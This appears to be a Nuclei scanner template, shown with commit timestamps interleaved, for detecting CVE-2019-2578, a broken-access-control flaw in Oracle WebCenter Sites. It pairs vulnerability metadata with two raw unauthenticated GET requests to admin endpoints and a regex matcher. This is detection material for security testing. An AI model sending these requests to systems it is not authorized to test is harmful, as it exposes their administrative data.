2021-11-06 00:24:41 +00:00
id : CVE-2019-2578
info :
2022-05-09 16:12:52 +00:00
name : Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - Broken Access Control
2021-11-06 00:24:41 +00:00
author : leovalcante
severity : high
2022-05-09 16:12:52 +00:00
description : Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 suffers from broken access control. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to gain unauthorized access to sensitive information or perform unauthorized actions.
2023-09-06 12:53:28 +00:00
remediation : |
Apply the necessary patches or updates provided by Oracle to fix the Broken Access Control vulnerability (CVE-2019-2578).
2022-04-07 13:53:15 +00:00
reference :
2022-05-09 16:12:52 +00:00
- https://www.oracle.com/security-alerts/cpuapr2019.html
2022-04-07 13:53:15 +00:00
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
- https://nvd.nist.gov/vuln/detail/CVE-2019-2578
2022-05-17 09:18:12 +00:00
- http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
2024-01-29 17:11:14 +00:00
- https://github.com/ARPSyndicate/kenzer-templates
2021-11-06 08:18:29 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 8.6
2021-11-06 08:18:29 +00:00
cve-id : CVE-2019-2578
2024-03-23 09:28:19 +00:00
epss-score : 0.00623
epss-percentile : 0.78436
2023-09-06 12:53:28 +00:00
cpe : cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : oracle
product : webcenter_sites
tags : cve,cve2019,oracle,wcs,auth-bypass
2021-11-06 00:24:41 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-11-06 00:24:41 +00:00
- raw :
- |
GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1
2021-11-06 08:11:08 +00:00
Host : {{Hostname}}
2021-11-06 00:24:41 +00:00
- |
GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1
2021-11-06 08:11:08 +00:00
Host : {{Hostname}}
stop-at-first-match : true
2021-11-06 00:24:41 +00:00
matchers :
- type : regex
part : body
2021-11-06 08:11:08 +00:00
regex :
2022-04-07 13:53:15 +00:00
- '<script[\d\D]*<throwexception/>'
2024-01-30 06:46:18 +00:00
# digest: 4a0a00473045022100991080f558306e44298979cd67512c4b586519842227c7c184df2abb4e1690850220725bb6e5b675017529463023cb2cdf7af8514fbc6eeb2328804f63c44634871c:922c64590222798bb761d5b6d8e72950